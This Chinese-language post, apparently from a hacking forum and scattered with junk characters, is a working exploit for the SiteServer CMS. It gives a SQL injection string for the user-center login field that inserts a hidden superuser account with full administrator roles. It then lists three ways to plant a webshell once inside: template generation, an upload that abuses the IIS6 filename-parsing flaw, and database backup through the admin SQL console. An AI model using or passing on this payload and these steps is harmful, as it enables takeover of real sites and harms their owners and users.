经测试秒杀最新的3.5版 b" M/ k( D+ n1 y, w: b m& }- z' I
- M5 E6 p& Q. z8 |0 Rstieserver官网:www.siteserver.cn
& H; H0 `8 L; i- B, o
9 l0 W2 Q2 y- A% X # q1 u- C* L& |( h7 Z$ g
: O) ^- J* J7 s
EXP:+ Q4 d% `8 l' K% T& s
# Z0 O; R& m- e- h& J5 i5 f) _
直接访问UserCenter/login.aspx
" x1 j4 L2 R0 m' G; M
+ A a9 Y% L" m/ h$ N1 c% i 6 I- \5 G% C$ z% D
% n( Z* R, E$ Q# n4 v) r2 Z用户名处输入:6 `6 q% P' a' X. V) q* G$ s
0 _4 ] Y( v# D123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
+ T" |* M: o8 ^# d$ K3 M& {9 P9 f/ k3 L
1 N# S& K7 ?, A0 j
1 z4 Q" B7 W: P* t密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。0 u) `; [6 e7 s
8 z" f. {2 Q# A1 V
4 g3 P( [$ r) h, `+ N8 v: F) p5 U6 y
之后再访问后台SiteServer/login.aspx用插入的用户登陆- a5 }1 A" c. M5 S { M
5 N' Q% \, \0 A* `( \' k+ {4 d 7 P+ c d2 f w) n6 q+ I4 u }- ~
+ q7 a( a3 ^+ Y; O& r, O后台拿webshell的三种方法:
) d' [( D" [* ~( A( |: Q9 v
0 X/ g$ g3 ^& S' s$ }一、 Q+ l$ c8 |0 F+ }/ o
, w0 L* Z: q# @
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
7 ?: z7 h* v" `/ |, Z0 J+ h4 N. z9 M3 P+ j3 I! }
二、
' N. s6 u; f# \+ J
- r$ O+ z5 |0 `, X9 Z4 S成员权限-》添加用户-》用户名为:1.asp$ F0 N9 I6 R j" s, s5 w9 _+ ]
0 z7 x0 W- Z0 l5 Z, f+ f
http://127.0.0.1/usercenter/
7 s3 H _. {3 U* Q' g% d3 w% ]! G a/ f, o7 N# E4 X7 B
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
& g, |6 E) B% E$ G
, D; k( t( i# u2 ~0 n6 `(ps:后台添加用户时不会验证是否含有非法字符)
c& [* ^" F: F' [* Y7 }, Q
~! z" j( I% g* B& |4 _/ D' t) v三、$ o3 R6 Y* f0 E
8 w* F1 ~( q/ m' \系统工具-》实用工具-》机器参数查看
& R! r: w- S5 w# f8 s0 D( l可以看到数据库类型、名称,WEB路径
, d& q7 o, a0 \: h
* K ?( d- S3 j5 J' P S系统工具-》数据库工具-》SQL语句查询$ E5 }/ w' j$ [" M" e8 l
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。) S- s$ M. T* A7 a2 t! `( D7 k
; E( d: j8 M$ |" k
|